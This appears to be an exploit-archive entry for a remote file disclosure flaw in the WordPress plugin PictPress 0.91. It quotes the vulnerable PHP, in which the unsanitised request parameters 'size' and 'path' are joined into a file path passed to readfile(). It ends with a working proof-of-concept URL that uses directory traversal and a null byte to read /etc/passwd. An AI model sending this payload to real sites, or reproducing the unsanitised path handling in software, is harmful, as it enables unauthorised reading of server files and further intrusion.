id: 2341
date: 12/05/2007
title: Wordpress Plugin PictPress <= 0.91 Remote File Disclosure Vulnerability
author: GoLd_M
cves: 

=======================================================================
Wordpress Plugin PictPress <= 0.91 Remote File Disclosure Vulnerability
=======================================================================



Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip
Vuln Code :
In Line 5,6,7,8 :
    $path = $_GET['path'];
    $size = $_GET['size'];
    $base = dirname(__FILE__) . "/..";
    $cache = "$base/cache/$size/$path";
In Line 22 :
    readfile($cache);
POC :
    /wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00



#  0day.today [2023-03-25]  #